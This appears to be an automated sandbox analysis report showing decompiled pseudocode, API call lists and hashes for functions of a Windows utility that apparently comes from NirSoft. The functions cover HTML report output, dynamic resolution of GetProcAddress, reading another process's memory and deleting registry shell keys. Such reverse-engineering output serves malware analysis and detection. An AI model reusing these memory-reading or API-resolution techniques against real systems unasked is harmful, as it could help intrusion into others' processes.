                                                                                                                                                                                                                          0x004062ad
                                                                                                                                                                                                                          0x004062b0
                                                                                                                                                                                                                          0x004062c3
                                                                                                                                                                                                                          0x004062c3
                                                                                                                                                                                                                          0x004062d3
                                                                                                                                                                                                                          0x004062da
                                                                                                                                                                                                                          0x004062f1
                                                                                                                                                                                                                          0x004062f7
                                                                                                                                                                                                                          0x004062fe
                                                                                                                                                                                                                          0x0040630d
                                                                                                                                                                                                                          0x00406312
                                                                                                                                                                                                                          0x0040631e
                                                                                                                                                                                                                          0x00406327
                                                                                                                                                                                                                          0x00406275
                                                                                                                                                                                                                          0x00406283
                                                                                                                                                                                                                          0x00406283
                                                                                                                                                                                                                          0x00406285
                                                                                                                                                                                                                          0x00406287
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00406277
                                                                                                                                                                                                                          0x0040627a
                                                                                                                                                                                                                          0x00406280
                                                                                                                                                                                                                          0x00406280
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00406280
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040627a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00406283
                                                                                                                                                                                                                          0x00406273
                                                                                                                                                                                                                          0x00406224
                                                                                                                                                                                                                          0x00406224
                                                                                                                                                                                                                          0x00406229
                                                                                                                                                                                                                          0x0040622a
                                                                                                                                                                                                                          0x0040622f
                                                                                                                                                                                                                          0x00406236
                                                                                                                                                                                                                          0x0040623c
                                                                                                                                                                                                                          0x00406243
                                                                                                                                                                                                                          0x00406245
                                                                                                                                                                                                                          0x00406247
                                                                                                                                                                                                                          0x00406248
                                                                                                                                                                                                                          0x0040624b
                                                                                                                                                                                                                          0x00406254
                                                                                                                                                                                                                          0x00406254
                                                                                                                                                                                                                          0x0040632d
                                                                                                                                                                                                                          0x00406334

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadMenuW.USER32 ref: 00406236
                                                                                                                                                                                                                            • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                                                                                                                            • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                                                                                                                            • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                                                                                                                            • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                                                                                                                          • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                                                                                                                          • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004062DA
                                                                                                                                                                                                                          • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                                                                                                                          • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                                                                                                                          • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                                                                                                                            • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                                                                                                                          • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                                                                                                                          • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                                                          			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                                                                                                                                          0x004081e4
                                                                                                                                                                                                                          0x004081ec
                                                                                                                                                                                                                          0x004081fc
                                                                                                                                                                                                                          0x00408200
                                                                                                                                                                                                                          0x00408215
                                                                                                                                                                                                                          0x0040821c
                                                                                                                                                                                                                          0x0040822a
                                                                                                                                                                                                                          0x00408231
                                                                                                                                                                                                                          0x0040823f
                                                                                                                                                                                                                          0x00408246
                                                                                                                                                                                                                          0x0040824b
                                                                                                                                                                                                                          0x0040824e
                                                                                                                                                                                                                          0x0040825a
                                                                                                                                                                                                                          0x0040825c
                                                                                                                                                                                                                          0x00408261
                                                                                                                                                                                                                          0x0040826c
                                                                                                                                                                                                                          0x0040826d
                                                                                                                                                                                                                          0x0040826e
                                                                                                                                                                                                                          0x00408273
                                                                                                                                                                                                                          0x00408273
                                                                                                                                                                                                                          0x00408276
                                                                                                                                                                                                                          0x0040827c
                                                                                                                                                                                                                          0x0040828a
                                                                                                                                                                                                                          0x00408290
                                                                                                                                                                                                                          0x004082ab
                                                                                                                                                                                                                          0x004082c5
                                                                                                                                                                                                                          0x004082c6
                                                                                                                                                                                                                          0x004082d1
                                                                                                                                                                                                                          0x004082d2
                                                                                                                                                                                                                          0x004082d3
                                                                                                                                                                                                                          0x004082e7
                                                                                                                                                                                                                          0x004082ec
                                                                                                                                                                                                                          0x004082f0
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004082f5
                                                                                                                                                                                                                          0x004082fe

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                          • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                                                                                                                          • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                          			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                                                                                                                          0x0040920a
                                                                                                                                                                                                                          0x00409218
                                                                                                                                                                                                                          0x00409223
                                                                                                                                                                                                                          0x0040922c
                                                                                                                                                                                                                          0x0040924b
                                                                                                                                                                                                                          0x00409253
                                                                                                                                                                                                                          0x0040929b
                                                                                                                                                                                                                          0x004092e4
                                                                                                                                                                                                                          0x0040929d
                                                                                                                                                                                                                          0x004092a3
                                                                                                                                                                                                                          0x004092b1
                                                                                                                                                                                                                          0x004092bd
                                                                                                                                                                                                                          0x004092cc
                                                                                                                                                                                                                          0x004092d1
                                                                                                                                                                                                                          0x004092d8
                                                                                                                                                                                                                          0x004092dd
                                                                                                                                                                                                                          0x00409255
                                                                                                                                                                                                                          0x0040925b
                                                                                                                                                                                                                          0x00409269
                                                                                                                                                                                                                          0x00409275
                                                                                                                                                                                                                          0x00409282
                                                                                                                                                                                                                          0x0040928d
                                                                                                                                                                                                                          0x00409292
                                                                                                                                                                                                                          0x004092ec
                                                                                                                                                                                                                          0x004092ef
                                                                                                                                                                                                                          0x004092ef
                                                                                                                                                                                                                          0x00409231
                                                                                                                                                                                                                          0x00409232
                                                                                                                                                                                                                          0x00409233
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409239
                                                                                                                                                                                                                          0x0040921a
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00409223
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00409233
                                                                                                                                                                                                                            • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                                                                                                                            • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                                                                                                                            • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00409282
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040928D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409269
                                                                                                                                                                                                                            • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                                                                                                                            • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004092B1
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004092CC
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 004092D8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                          • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                                                                                                                          • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                                                          			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                                                                                                                                                          0x00409c73
                                                                                                                                                                                                                          0x00409c7c
                                                                                                                                                                                                                          0x00409c90
                                                                                                                                                                                                                          0x00409c9f
                                                                                                                                                                                                                          0x00409ca2
                                                                                                                                                                                                                          0x00409ca7
                                                                                                                                                                                                                          0x00409ca9
                                                                                                                                                                                                                          0x00409cb1
                                                                                                                                                                                                                          0x00409cc0
                                                                                                                                                                                                                          0x00409cc2
                                                                                                                                                                                                                          0x00409cc7
                                                                                                                                                                                                                          0x00409ccf
                                                                                                                                                                                                                          0x00409cd0
                                                                                                                                                                                                                          0x00409cd7
                                                                                                                                                                                                                          0x00409cd8
                                                                                                                                                                                                                          0x00409cd9
                                                                                                                                                                                                                          0x00409cda
                                                                                                                                                                                                                          0x00409cdc
                                                                                                                                                                                                                          0x00409ce0
                                                                                                                                                                                                                          0x00409ce1
                                                                                                                                                                                                                          0x00409ce9
                                                                                                                                                                                                                          0x00409cf1
                                                                                                                                                                                                                          0x00409cfb
                                                                                                                                                                                                                          0x00409d08
                                                                                                                                                                                                                          0x00409d08
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409d0d
                                                                                                                                                                                                                          0x00409d0f

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00409CE4
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00409CF1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcstrlen
                                                                                                                                                                                                                          • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 1027343248-2054640941
                                                                                                                                                                                                                          • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                                                                                                                          • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                          			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}


























                                                                                                                                                                                                                          0x00401ac9
                                                                                                                                                                                                                          0x00401ad1
                                                                                                                                                                                                                          0x00401ae1
                                                                                                                                                                                                                          0x00401ae7
                                                                                                                                                                                                                          0x00401ae9
                                                                                                                                                                                                                          0x00401aec
                                                                                                                                                                                                                          0x00401c1b
                                                                                                                                                                                                                          0x00401af2
                                                                                                                                                                                                                          0x00401af2
                                                                                                                                                                                                                          0x00401af8
                                                                                                                                                                                                                          0x00401b0c
                                                                                                                                                                                                                          0x00401b1a
                                                                                                                                                                                                                          0x00401bfd
                                                                                                                                                                                                                          0x00401b20
                                                                                                                                                                                                                          0x00401b26
                                                                                                                                                                                                                          0x00401b2b
                                                                                                                                                                                                                          0x00401b36
                                                                                                                                                                                                                          0x00401b40
                                                                                                                                                                                                                          0x00401b43
                                                                                                                                                                                                                          0x00401b4a
                                                                                                                                                                                                                          0x00401b54
                                                                                                                                                                                                                          0x00401b55
                                                                                                                                                                                                                          0x00401b56
                                                                                                                                                                                                                          0x00401b57
                                                                                                                                                                                                                          0x00401b58
                                                                                                                                                                                                                          0x00401b63
                                                                                                                                                                                                                          0x00401b68
                                                                                                                                                                                                                          0x00401b69
                                                                                                                                                                                                                          0x00401b77
                                                                                                                                                                                                                          0x00401b7d
                                                                                                                                                                                                                          0x00401b82
                                                                                                                                                                                                                          0x00401b82
                                                                                                                                                                                                                          0x00401b88
                                                                                                                                                                                                                          0x00401b8b
                                                                                                                                                                                                                          0x00401b8e
                                                                                                                                                                                                                          0x00401b91
                                                                                                                                                                                                                          0x00401b98
                                                                                                                                                                                                                          0x00401b9b
                                                                                                                                                                                                                          0x00401ba0
                                                                                                                                                                                                                          0x00401ba5
                                                                                                                                                                                                                          0x00401baa
                                                                                                                                                                                                                          0x00401bac
                                                                                                                                                                                                                          0x00401bac
                                                                                                                                                                                                                          0x00401bb2
                                                                                                                                                                                                                          0x00401bb2
                                                                                                                                                                                                                          0x00401bbe
                                                                                                                                                                                                                          0x00401bc4
                                                                                                                                                                                                                          0x00401bc6
                                                                                                                                                                                                                          0x00401bc8
                                                                                                                                                                                                                          0x00401bc8
                                                                                                                                                                                                                          0x00401bd7
                                                                                                                                                                                                                          0x00401bee
                                                                                                                                                                                                                          0x00401bf0
                                                                                                                                                                                                                          0x00401bf0
                                                                                                                                                                                                                          0x00401c0e
                                                                                                                                                                                                                          0x00401c0e
                                                                                                                                                                                                                          0x00401c23

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401B4A
                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                                                                                                                            • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                                                                            • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %d %I64x
                                                                                                                                                                                                                          • API String ID: 2567117392-2565891505
                                                                                                                                                                                                                          • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                                                                                                                          • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                                                                          			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                                                                                                                                                          0x004045c2
                                                                                                                                                                                                                          0x004045d1
                                                                                                                                                                                                                          0x004045da
                                                                                                                                                                                                                          0x004045ef
                                                                                                                                                                                                                          0x004045f6
                                                                                                                                                                                                                          0x00404604
                                                                                                                                                                                                                          0x0040460b
                                                                                                                                                                                                                          0x00404610
                                                                                                                                                                                                                          0x00404616
                                                                                                                                                                                                                          0x00404617
